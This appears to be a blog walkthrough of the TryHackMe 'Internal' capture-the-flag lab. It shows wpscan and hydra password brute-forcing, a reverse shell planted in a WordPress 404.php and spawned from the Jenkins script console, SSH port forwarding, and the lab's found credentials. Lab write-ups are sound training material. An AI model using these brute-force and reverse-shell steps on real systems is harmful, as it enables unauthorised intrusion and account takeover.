CHALLENGE OVERVIEW
- CTF Creator: TheMayor
- Link: https://tryhackme.com/room/internal
- Difficulty: Hard
- Target: Root/User flags
- Highlight: Enumerating a wordpress site with wpscan
- Tools used:
pentest.ws,hydra,nmap,dirb,linpeas,sshwith port forwarding - Tags: CTF, security, accessible, pentest, blackbox
BACKGROUND
This CTF challenge is another blackbox-style pentest where we don’t know anything about our target other than the IP address.
We will have to discover ports and services running on the server with our standard pentesting tools like nmap and dirb scan. We also don’t have any inside information about the backend of the target machine.
Let’s get started!
We’ll be testing out the website pentest.ws during today’s video walkthrough.
It is a site designed for pentesters to keep track of their enumeration and credentials. The paid version also helps pentesters create professional VAPT reports (vulnerability assessment and penetration testing reports).
At the end of this post, I will summarize my thoughts on using pentest.ws for the first time.
ENUMERATION/RECON
sudo nmap -A -oX nmap.txt $targetIP -p-
Today we are exporting our nmap results in XML format so that we can upload them to pentest.ws and have the site automatically parse our findings.
dirb http://$targetIP -o dirb.txt
We discovered a WordPress login at: http://internal.thm/blog/wp-login.php
USING WPSCAN TO EXTRACT WORDPRESS LOGIN CREDENTIALS
Let’s use wpscan to discover the admin’s email and password for WordPress.
wpscan --url 10.10.61.252/blog -e vpn,u -o wpscan.txt
Now that we found a username, we can run wpscan again with a wordlist to brute-force the password.
wpscan --url 10.10.61.262/blog --usernames admin --passwords /home/kalisurfer/hacking-tools/rockyou.txt --max-threads 50 -o wpscan-passwds.txt
We found the admin email and password!
admin:my2boys
Now we can log into WordPress and look for a place to upload a revshell.
INITIAL FOOTHOLD – SPAWN A REVSHELL BY EDITING 404.PHP
We’ll edit the template for 404.php and drop in a revshell created quickly and easily with EzpzShell.py.
If you want to learn more about ezpzshell, check out my previous blog post:
👉 Learn More: EzpzShell: An Easy-Peasy Python Script That Simplifies Revshell Creation
ezpz 10.6.2.23 8888 php (ezpzshell also automatically starts a listener)
After copying the payload to 404.php, we make sure it is saved and then trigger the payload:
http://internal.thm/wordpress/wp-content/themes/twentyseventeen/404.php
And if everything is set up correctly, we will catch the revshell with ezpz as user: www-data.
STABILIZE THE SHELL
The following command will stabilize the shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
INTERNAL ENUMERATION – FIND USER CREDS
We discover a txt file with credentials:
cat wp-save.txt Bill, Aubreanna needed these credentials for something later. Let her know you have them and where they are. aubreanna:bubb13guM!@#123
Let’s try switching users to aubreanna with the password given in wp-save.txt.
su aubreanna
We are in as user aubreanna and immediately find the user flag.
aubreanna@internal:~$ cat us
cat user.txt
THM{i—------omitted--------1}
MORE ENUMERATION – DISCOVER A JENKINS SERVICE
cat jenkins.txt Internal Jenkins service is running on 172.17.0.2:8080
SET UP PORT FORWARDING VIA SSH LOGIN
ssh -L 8080:172.17.0.2:8080 aubreanna@10.10.61.252
SUCCESS! WE’VE CONNECTED UP TO JENKINS VIA SSH PORT FORWARDING! We can now open the Jenkins login page in our browser.
BRUTE-FORCE THE LOGIN
hydra -l admin -P /home/kalisurfer/hacking-tools/SecLists/Passwords/Leaked-Databases/rockyou-75.txt -s 8080 127.0.0.1 http-post-form '/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in&login=:Invalid username or password'
The payload on this command has three parts:
http-post-form+header- the request, edited with admin as the username and
^PASS^in place of the password to mark it as the variable for the password wordlist - the error message that the website will return with a wrong password
Output:
Using burpsuite or developer mode on firefox will allow us to extract these strings and modify it to our final hydra payload.
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
\
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-02-06 08:57:08
[DATA] max 16 tasks per 1 server, overall 16 tasks, 59185 login tries (l:1/p:59185), ~3700 tries per task
[DATA] attacking http-post-form://127.0.0.1:8080/j_acegi_security_check:j_username=admin&j_password=^PASS^&from=%2F&Submit=Sign+in&login=:Invalid username or password
[STATUS] 396.00 tries/min, 396 tries in 00:01h, 58789 to do in 02:29h, 16 active
[8080][http-post-form] host: 127.0.0.1 login: admin password: spongebob
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-02-06 08:58:10
Credentials found! admin:spongebob
ENUMERATING JENKINS AS ADMIN
We’ll use the script console on Jenkins to spawn another revshell using groovy scripting language.
We’ll use ezpzshell and choose the Java code, because groovy is built on Java. This time when we catch it, we will be user jenkins.
Manually enumerating through the file system we stumble across a note.txt. Let’s check out the contents:
cat note.txt
Output:
Aubreanna,
Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here. Use them if you need access to the root user account.
root:tr0ub13guM!@#123
Bingo! We found root user credentials!
SWITCH USERS TO ROOT
su root
root@internal:~# cat root.txt
THM{d—-omitted—3r}
FINAL THOUGHTS
I’m not convinced yet that pentest.ws will save me much time on my note taking. Maybe with time and experience it would help.
I think the report features that are available for paying subscribers might be just helpful enough to keep me using their platform.
However, I have concerns about security of their platform, as findings from pentesting can be sensitive and generally include login credentials and other passwords.
Overall, I enjoyed the challenge of this box, especially the part where we set up port forwarding via SSH login to expose the Jenkins login portal to our attack machine.
👉 Recommended: EzpzShell: An Easy-Peasy Python Script That Simplifies Revshell Creation
I am a freelance ethical hacker/penetration tester. I have extensive experience in penetration testing and vulnerability assessments on web apps and servers. I am also fluent in Mandarin and have 15 years of experience as an edTech integration specialist, curriculum designer, and foreign language teacher. Here’s my personal website.